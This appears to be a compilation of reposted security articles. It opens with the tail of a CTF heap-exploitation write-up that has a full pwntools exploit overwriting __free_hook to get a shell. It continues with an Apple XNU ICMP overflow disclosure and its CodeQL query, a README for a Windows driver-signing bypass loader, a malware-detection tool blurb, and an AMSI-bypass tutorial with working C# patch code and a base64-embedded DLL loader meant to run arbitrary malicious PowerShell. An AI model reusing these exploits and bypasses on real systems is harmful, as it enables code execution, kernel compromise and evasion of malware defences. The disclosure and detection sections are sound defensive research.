        tcache1[i]=malloc(0xF8);
    for(int i=0;i<7;i++)
        free(tcache1[i]);

    // make 0x108 tcache full
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    free(a); // a goes to an unsorted bin

    tcache1[0]=malloc(0xF8);//creates one free place in 0xf8 tcache 
    // b will go to tcache after free(). 

    // in the CTF task we can only write data to chunks
    // right after mallocing this chunk
    free(b);
    b = malloc(0xf8);
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    printf("b: %p\n",b);
   
    // make 0xf8 tcache full
    free(tcache1[0]);

    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);
    
    // make 0x108 tcache empty
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);


    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A);

    // leak libc
    printf("b content: %p\n",((long*)b)[0]);

    // make 0x108 tcache full because we can have max 10 chunks allocated 
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    // Both 0xf8 and 0x108 tcache bins are full

    // let's allocate chunk that overlaps b.
    char *B = malloc(0x1F8);
    printf("B: %p\n",B);

    // now, chunks B and b are allocated and have the same address. 
    // now we can use double free and tcache poisoning attack

    // double free
    free(B);
    free(b);
    // now, 0x1F8 tcache bin contains 2 the same chunks 

    // allocate one of them and set next pointer to known address
    b = malloc(0x1F8);
    *(long*)(b) = &var;
    
    malloc(0x1F8);
	
    // the allocated chunk will have an address of variable var
    char *super_pointer = malloc(0x1F8);
	
    printf("%p %p\n",super_pointer,&var);
}

output:

a: 0x55c054fa2260
b: 0x55c054fa2370
c: 0x55c054fa2470
b: 0x55c054fa2370
A: 0x55c054fa2260
b content: 0x7f60c1026ca0
B: 0x55c054fa2370
0x55c053972060 0x55c053972060

And the last step is to implement an exploit in python. It does the same thing as previous code, except that malloc returns to us a region at &__free_hook. Then we overwrite __free_hook to one-gadget RCE. Later it calls free.

from pwn import *

r = remote("localhost", 1337)
#r = remote("54.178.132.125",8763)
pointers = [False]*10

def menu():
    print r.recvuntil("choice: ") 

def new_heap(size, data):
    #find idx
    global pointers
    idx = None
    for i in range(10):
        if not pointers[i]:
            pointers[i] = True
            idx = i
            break
    assert(idx is not None)
	
    r.send("1")
    print r.recvuntil("Size:")
    r.send(str(size))
    print r.recvuntil("Data:")
    r.send(data)
    menu()
    return idx
	
def show_heap(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
	
def show_heap_leak(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    data = r.recvuntil("choice: ")
    addr = data.split("\n")[0]
    addr = addr.ljust(8,"\x00")
    return u64(addr)
	
	
def delete_heap(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
    return None
	
def delete_heap_and_shell(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    r.interactive()

tcache1 = [None]*10
tcache2 = [None]*10
	
menu()
a = new_heap(0x108,"a"*10)
b = new_heap(0xf8,"b"*10)
c = new_heap(0xf8,"c"*10)

# make 0xf8 tcache full
for i in range(7):
    tcache1[i] = new_heap(0xF8, "sss"+str(i))
for i in range(7):
    tcache1[i] = delete_heap(tcache1[i])

# make 0x108 tcache full 
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

a = delete_heap(a) #a goes to an unsorted bin

tcache1[0] = new_heap(0xF8, "sss0") #create one free place in 0xf8 tcache

# buffer overflow by 1 NULL byte
b = delete_heap(b);
b = new_heap(0xf8,"b"*0xf8) #clear prev in use of c

# Clear prev size
# This is tricki because data to chunk is copied by strcpy which 
# stops copying on NULL byte.
# If we want to clean an region we need to free and allocate several
# chunks that each next size is lower than 1 byte.  
for i in range(0xf8, 0xf3, -1):
    b = delete_heap(b);
    b = new_heap(i-1,(i-1)*"b")

# set prev_size of c to 0x210 bytes
b = delete_heap(b);
b = new_heap(0xF2,"b"*0xf0+"\x10\x02")

# make 0xf8 tcache full
tcache1[0] = delete_heap(tcache1[0])

# c have prev_in_use=0 and prev_size=0x210 so it will consolidate
# with a and b and it will be put in unsorted bin
c = delete_heap(c)

# make 0x108 tcache empty
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))

# now we allocate chunks from area of  a|b|c
A = new_heap(0x108, "AAA")

# leak libc
addr=show_heap_leak(b)
libc_base = addr - 0x3ebca0
free_hook = libc_base + 0x3ed8e8
print "libc base = "+hex(libc_base)
print "free hook = "+hex(free_hook)


# make 0x108 tcache full because we can have max 10 chunks allocated
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

# Both 0xf8 and 0x108 tcache bins are ful
	
ADDR_TO_WRITE = free_hook	

# let's allocate chunk that overlaps b.
B = new_heap(0x1f8, "BBB")

# now, chunks B and b are allocated and have the same address. 
# We can use double free and tcache poisoning attack

# double free
delete_heap(B)
delete_heap(b)
# now 0x1F8 tcache bin contains 2 the same chunks

# allocate one of them and set next pointer to known address
b = new_heap(0x1f8, p64(ADDR_TO_WRITE))

new_heap(0x1f8, "kkkk")

# allocated chunk will have an address of &__free_hook, 
# overwrite __free_hook to one-gadget RCE there
super_pointer = new_heap(0x1f8, p64(libc_base + 0x04F322))

# trigger __free_hook that is overwritten to one-gadget RCE
delete_heap_and_shell(b)

References

Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)

( Original text )

This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

The following operating system versions and devices are vulnerable:

  • Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
  • Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
  • Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
  • Apple OS X El Capitan and earlier: all devices

I reported the vulnerability in time for Apple to patch the vulnerability for iOS 12 (released on September 17) and macOS Mojave (released on September 24). Both patches were announced retrospectively on October 30.

Severity and Mitigation

The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and Macbooks are all affected. To trigger the vulnerability, an attacker merely needs to send a malicious IP packet to the IP address of the target device. No user interaction is required. The attacker only needs to be connected to the same network as the target device. For example, if you are using the free WiFi in a coffee shop then an attacker can join the same WiFi network and send a malicious packet to your device. (If an attacker is on the same network as you, it is easy for them to discover your device’s IP address using nmap.) To make matters worse, the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you: I tested the vulnerability on a Mac running McAfee® Endpoint Security for Mac and it made no difference. It also doesn’t matter what software you are running on the device — the malicious packet will still trigger the vulnerability even if you don’t have any ports open.

Since an attacker can control the size and content of the heap buffer overflow, it may be possible for them to exploit this vulnerability to gain remote code execution on your device. I have not attempted to write an exploit which is capable of doing this. My exploit PoC just overwrites the heap with garbage, which causes an immediate kernel crash and device reboot.

I am only aware of two mitigations against this vulnerability:

  1. Enabling stealth mode in the macOS firewall prevents the attack from working. Kudos to my colleague Henti Smith for discovering this, because this is an obscure system setting which is not enabled by default. As far as I’m aware, stealth mode does not exist on iOS devices.
  2. Do not use public WiFi networks. The attacker needs to be on the same network as the target device. It is not usually possible to send the malicious packet across the internet. For example, I wrote a fake web server which sends back a malicious reply when the target device tries to load a webpage. In my experiments, the malicious packet never arrived, except when the web server was on the same network as the target device.

Proof-of-concept exploit

I have written a proof-of-concept exploit which triggers the vulnerability. To give Apple’s users time to upgrade, I will not publish the source code for the exploit PoC immediately. However, I have made a short video which shows the PoC in action, crashing all the Apple devices on the local network.

The vulnerability

The bug is a buffer overflow in this line of code (bsd/netinet/ip_icmp.c:339):

m_copydata(n, 0, icmplen, (caddr_t)&icp->icmp_ip);

This code is in the function icmp_error. According to the comment, the purpose of this function is to «Generate an error packet of type error in response to bad packet ip». It uses the ICMP protocol to send out the error message. The header of the packet that caused the error is included in the ICMP message, so the purpose of the call to m_copydata on line 339 is to copy the header of the bad packet into the ICMP message. The problem is that the header might be too big for the destination buffer. The destination buffer is an mbufmbuf is a datatype which is used to store both incoming and outgoing network packets. In this code, n is an incoming packet (containing untrusted data) and m is an outgoing ICMP packet. As we will see shortly, icp is a pointer into mm is allocated on line 294 or line 296:

if (MHLEN > (sizeof(struct ip) + ICMP_MINLEN + icmplen))
  m = m_gethdr(M_DONTWAIT, MT_HEADER);  /* MAC-OK */
else
  m = m_getcl(M_DONTWAIT, MT_DATA, M_PKTHDR);

Slightly further down, on line 314mtod is used to get m‘s data pointer:

icp = mtod(m, struct icmp *);

mtod is just macro, so this line of code does not check that the mbuf is large enough to hold an icmp struct. Furthermore, the data is not copied to icp, but to &icp->icmp_ip, which is at an offset of +8 bytes from icp.

I do not have the necessary tools to be able to step through the XNU kernel in a debugger, so I am actually a little unsure about the exact allocation size of the mbuf. Based on what I see in the source code, I think that m_gethdr creates an mbuf that can hold 88 bytes, but I am less sure about m_getcl. Based on practical experiments, I have found that a buffer overflow is triggered when icmplen >= 84.

At this time, I will not say any more about how the exploit works. I want to give Apple users a chance to upgrade their devices first. However, in the relatively near future I will publish the source code for the exploit PoC in our SecurityExploits repository.

Finding the vulnerability with QL

I found this vulnerability by doing variant analysis on the bug that caused the buffer overflow vulnerability in the packet-mangler. That vulnerability was caused by a call to mbuf_copydata with a user-controlled size argument. So I wrote a simple query to look for similar bugs:

**
 * @name mbuf copydata with tainted size
 * @description Calling m_copydata with an untrusted size argument
 *              could cause a buffer overflow.
 * @kind path-problem
 * @problem.severity warning
 * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size
 */

import cpp
import semmle.code.cpp.dataflow.TaintTracking
import DataFlow::PathGraph

class Config extends TaintTracking::Configuration {
  Config() { this = "tcphdr_flow" }

  override predicate isSource(DataFlow::Node source) {
    source.asExpr().(FunctionCall).getTarget().getName() = "m_mtod"
  }

  override predicate isSink(DataFlow::Node sink) {
    exists (FunctionCall call
    | call.getArgument(2) = sink.asExpr() and
      call.getTarget().getName().matches("%copydata"))
  }
}

from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "m_copydata with tainted size."

This is a simple taint-tracking query which looks for dataflow from m_mtod to the size of argument of a «copydata» function. The function named m_mtod returns the data pointer of an mbuf, so it is quite likely that it will return untrusted data. It is what the mtod macro expands to. Obviously m_mtod is just one of many sources of untrusted data in the XNU kernel, but I have not included any other sources to keep the query as simple as possible. This query returns 9 results, the first of which is the vulnerability in icmp_error. I believe the other 8 results are false positives, but the code is sufficiently complicated that I do consider them to be bad query results.

Try QL on XNU

Unlike most other open source projects, XNU is not available to query on LGTM. This is because LGTM uses Linux workers to build projects, but XNU can only be built on a Mac. Even on a Mac, XNU is highly non-trivial to build. I would not have been able to do it if I had not found this incredibly useful blog post by Jeremy Andrus. Using Jeremy Andrus’s instructions and scripts, I have manually built snapshots for the three most recent published versions of XNU. You can download the snapshots from these links: 10.13.410.13.510.13.6. Unfortunately, Apple have not yet released the source code for 10.14 (Mojave / iOS 12), so I cannot create a QL snapshot for running queries against it yet. To run queries on these QL snapshots, you will need to download QL for Eclipse. Instructions on how to use QL for Eclipse can be found here.

Timeline

  • 2018-08-09: Privately disclosed to product-security@apple.com. Proof-of-concept exploit included.
  • 2018-08-09: Report acknowledged by product-security@apple.com.
  • 2018-08-20: product-security@apple.com asked me to send them the exact macOS version number and a panic log.
  • 2018-08-20: Returned the requested information to product-security@apple.com. Also sent them a slightly improved version of the exploit PoC.
  • 2018-08-22: product-security@apple.com confirmed that the issue is fixed in the betas of macOS Mojave and iOS 12. However, they also said that they are «investigating addressing this issue on additional platforms» and that they will not disclose the issue until November 2018.
  • 2018-09-17: iOS 12 released by Apple. The vulnerability was fixed.
  • 2018-09-24: macOS Mojave released by Apple. The vulnerability was fixed.
  • 2018-10-30: Vulnerabilities disclosed.

"Send it back"

Credits

  • «I am Error». Screenshot from Zelda II: The Adventure of Link. The screenshot copyright is believed to belong to Nintendo. Image downloaded from wikipedia.
  • «Send it back». By Edward Backhouse.

Library to reflectively load a driver and bypass Windows Driver signing enforcement .

Картинки по запросу kernel driver signing

About

Reflective Kernel Driver injection is a injection technique base off Reflective DLL injection by Stephen Fewer. The technique bypasses Windows driver signing enforcement (KMCS). Reflective programming is employed to perform the loading of a driver from memory into the kernel. As such the driver is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. Injection works on Windows Vista up to Windows 10, running on x64.

An exploit for the Capcom driver is also included as a simple usage example.

Overview

The process of injecting a driver into the kernel is twofold. Firstly, the driver you wish to inject must be written into the kernel address space. Secondly the driver must be loaded into kernel in such a way that the driver’s run time expectations are met, such as resolving its imports or relocating it to a suitable location in memory.

Assuming we have ring0 code execution and the driver we wish to inject has been written into an arbitrary location of memory kernel, Reflective Driver Injection works as follows.

  • Execution is passed, either via PSCreateSystemThread() or a tiny bootstrap shellcode, to the driver’s ReflectiveLoader function which is located at the beginning of the driver’s code section (typically offset 0x400).
  • As the driver’s image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image’s current location in memory so as to be able to parse its own headers for use later on.
  • The ReflectiveLoader will then use MmGetSystemRoutineAddress (assumed to be passed in as arg0) to calculate the addresses of six functions required by the loader, namely ExAllocatePoolWithTag, ExFreePoolWithTag, IoCreateDriver, RtlImageDirectoryEntryToData, RtlImageNtHeader, and RtlQueryModuleInformation.
  • The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.
  • The driver’s headers and sections are loaded into their new locations in memory.
  • The ReflectiveLoader will then process the newly loaded copy of its image’s relocation table.
  • The ReflectiveLoader will then process the newly loaded copy of its image’s import table, resolving any module dependencies (assuming they are already loaded into the kernel) and their respective imported function addresses.
  • The ReflectiveLoader will then call IoCreateDriver passing the driver’s DriverEntry exported function as the second parameter. The driver has now been successfully loaded into memory.
  • Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via PSCreateSystemThread, the thread will terminate.

Build

Open the ‘Reflective Driver Loading.sln’ file in Visual Studio C++ and build the solution in Release mode to make Hadouken.exe and reflective_driver.sys

Usage

To test load Capcom.sys into the kernel then use the Hadouken.exe to inject reflective_driver.sys into the kernel e.g.:

Hadouken reflective_driver.sys

DOWNLOAD

PE-sieve is a light-weight tool that helps to detect malware running on the system

PE-sieve

PE-sieve is a light-weight tool that helps to detect malware running on the system, as well as to collect the potentially malicious material for further analysis. Recognizes and dumps variety of implants within the scanned process: replaced/injected PEs, shellcodes, hooks, and other in-memory patches.
Detects inline hooks, Process Hollowing, Process Doppelgänging, Reflective DLL Injection, etc.

uses library: https://github.com/hasherezade/libpeconv.git

Clone:

Use recursive clone to get the repo together with the submodule:

git clone --recursive https://github.com/hasherezade/pe-sieve.git

Latest builds*:

*those builds are available for testing and they may be ahead of the official release:

example: classic unmapping (2) vs remapping (3) — with remapping full virtual content of the section is preserved, so it helps i.e. if the full section was unpacked in memory, or if virtual caves were used


logo by Baran Pirinçal

How to bypass AMSI and execute ANY malicious Powershell code

Картинки по запросу amsi microsoft

( original text by 

Hello again. In my previous posts I detailed how to manually get SYSTEM shell from Local Administrators users. That’s interesting but very late game during a penetration assessment as it is presumed that you already owned the target machine.

This post will be more useful for early game, as AMSI (Anti Malware Scan Interface) can be a trouble to get a shell, or to execute post-exploitation tools while you still do not have an admin shell.

What is AMSI?

AMSI stands for “ANTI MALWARE SCAN INTERFACE”;

As it’s name suggests, it’s job is to scan, detect and block anything that does bad stuff.

Still doesn’t know what this is? Check this screenshot:

Screenshot

Obviously if you are experienced with penetration testing in Windows environments, you had such error with almost all public known scripts that are used like some in Nishang, Empire, PowerSploit and other awesome PowerShell scripts.

How does AMSI works?

AMSI uses “string-based” detection measures to determine if a PowerShell code is malicious or not.

Check this example:

Screenshot

Yes, the word “amsiutils” is banned. If have this word in your name, my friend, you are a malicious person for AMSI.

How to bypass string detection?

Everyone knows that string detection is very easy to bypass, just don’t use your banned string literally. Use encoding or split it in chunks and reassemble to get around this.

Here are three ways of executing the “banned” code and not get blocked:

Screenshot

Simply by splitting the word in half is enough to fool this detection scheme. We see this a lot in obfuscation. But in most of the cases, this method can fail.

Screenshot

In some cases, simply by decoding a Base64 banned code is enough to get around it.

Screenshot

And of course, you could use XOR to trick amsi and decode your string back to memory during runtime. This would be the more effective one, as it would need a higher abstraction to detect it.

All this techniques are to “GET AROUND” string detection, but we don’t want that. We want to execute the scripts in original state, the state where they are blocked by AMSI.

AMSI bypass by memory patching

This is the true bypass. Actually we do not “bypass” in the strict meaning of the word, we actually DISABLE it.

AMSI has several functions that are executed before any PowerShell code is run (from Powershell v3.0 onwards), so to bypass AMSI completely and execute any PowerShell malware, we need to memory patch them to COMPLETELY DISABLE it.

The best technique I have found in the internet is in this Link and it works in most recent version of Windows!

I wont enter in details about memory patching, you can get these details in above link

Instead, we will weaponize this technique and apply it to a PowerShell script, so we can use it in our real life engagements!

We will compile a C# DLL with code that will apply the above mentioned technique and then we will load and execute this code in a PowerShell session, disabling AMSI completely!

using System;
using System.Runtime.InteropServices;

namespace Bypass
{
    public class AMSI
    {
        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string name);
        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
        static extern void MoveMemory(IntPtr dest, IntPtr src, int size);


        public static int Disable()
        {
            IntPtr TargetDLL = LoadLibrary("amsi.dll");
            if (TargetDLL == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve amsi.dll pointer.");
                return 1;
            }

            IntPtr AmsiScanBufferPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer");
            if (AmsiScanBufferPtr == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve AmsiScanBuffer function pointer");
                return 1;
            }

            UIntPtr dwSize = (UIntPtr)5;
            uint Zero = 0;
            if (!VirtualProtect(AmsiScanBufferPtr, dwSize, 0x40, out Zero))
            {
                Console.WriteLine("ERROR: Could not change AmsiScanBuffer memory permissions!");
                return 1;
            }

            /*
             * This is a new technique, and is still working.
             * Source: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
             */
            Byte[] Patch = { 0x31, 0xff, 0x90 };
            IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
            Marshal.Copy(Patch, 0, unmanagedPointer, 3);
            MoveMemory(AmsiScanBufferPtr + 0x001b, unmanagedPointer, 3);

            Console.WriteLine("AmsiScanBuffer patch has been applied.");
            return 0;
        }
    }
}

Now, with possession of a DLL of the above code, use it like this:

Screenshot

See that we are able to use the banned word freely. From this point onwards, THERE IS NO AMSI. We are free to load ANY powershell script, malicious or not. By combining this type of attack with your malicious tools you will 100% success against AMSI.

Weaponinzing with PowerShell

Of course, in a Penetration Test we must have tools to apply such techniques automatically. Again, as we used .NET framework through C#, we can create a Posh script that reflects our DLL in-memory during runtime, without the need to touch the disk with our DLL.

Here is my PowerShell script to disable AMSI:

function Bypass-AMSI
{
    if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
        [Reflection.Assembly]::Load([Convert]::FromBase64String("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N0RBQ0VEAEJ5cGFzc0FNU0kAbXNjb3JsaWIAc3JjAERpc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAENvbnNvbGUAaE1vZHVsZQBwcm9jTmFtZQBuYW1lAFdyaXRlTGluZQBWYWx1ZVR5cGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBkd1NpemUAc2l6ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEFsbG9jSEdsb2JhbABNYXJzaGFsAEtlcm5lbDMyLmRsbABCeXBhc3NBTVNJLmRsbABTeXN0ZW0AU3lzdGVtLlJlZmxlY3Rpb24Ab3BfQWRkaXRpb24AWmVybwAuY3RvcgBVSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBSdW50aW1lSGVscGVycwBCeXBhc3MAR2V0UHJvY0FkZHJlc3MAbHBBZGRyZXNzAE9iamVjdABscGZsT2xkUHJvdGVjdABWaXJ0dWFsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAZGVzdABJbml0aWFsaXplQXJyYXkAQ29weQBMb2FkTGlicmFyeQBSdGxNb3ZlTWVtb3J5AG9wX0VxdWFsaXR5AAAAABFhAG0AcwBpAC4AZABsAGwAAFdFAFIAUgBPAFIAOgAgAEMAbwB1AGwAZAAgAG4AbwB0ACAAcgBlAHQAcgBpAGUAdgBlACAAYQBtAHMAaQAuAGQAbABsACAAcABvAGkAbgB0AGUAcgAuAAAdQQBtAHMAaQBTAGMAYQBuAEIAdQBmAGYAZQByAABzRQBSAFIATwBSADoAIABDAG8AdQBsAGQAIABuAG8AdAAgAHIAZQB0AHIAaQBlAHYAZQAgAEEAbQBzAGkAUwBjAGEAbgBCAHUAZgBmAGUAcgAgAGYAdQBuAGMAdABpAG8AbgAgAHAAbwBpAG4AdABlAHIAAHVFAFIAUgBPAFIAOgAgAEMAbwB1AGwAZAAgAG4AbwB0ACAAYwBoAGEAbgBnAGUAIABBAG0AcwBpAFMAYwBhAG4AQgB1AGYAZgBlAHIAIABtAGUAbQBvAHIAeQAgAHAAZQByAG0AaQBzAHMAaQBvAG4AcwAhAABNQQBtAHMAaQBTAGMAYQBuAEIAdQBmAGYAZQByACAAcABhAHQAYwBoACAAaABhAHMAIABiAGUAZQBuACAAYQBwAHAAbABpAGUAZAAuAAAAAABNy6E5KHzvRJzwgzKCw/hXAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIHBwUYGBkJGAIGGAUAAgIYGAQAAQEOBAABGQsHAAIBEmERZQQAARgICAAEAR0FCBgIBQACGBgICLd6XFYZNOCJAwYREAUAAhgYDgQAARgOCAAEAhgZCRAJBgADARgYCAMAAAgIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAADwEACkJ5cGFzc0FNU0kAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACQ4Y2ExNGM0OS02NDRiLTQwY2YtYjFjNy1hNWJkYWViMGIyY2EAAAwBAAcxLjAuMC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMgEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjIEAQAAAAAAAAAAAN3BR94AAAAAAgAAAGUAAAAMLAAADA4AAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAABSU0RTac9x8RJ6SEet9F+qmVae0gEAAABDOlxVc2Vyc1xhbmRyZVxzb3VyY2VccmVwb3NcQnlwYXNzQU1TSVxCeXBhc3NBTVNJXG9ialxSZWxlYXNlXEJ5cGFzc0FNU0kucGRiAJksAAAAAAAAAAAAALMsAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAClLAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAAAAAD/JQAgABAx/5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA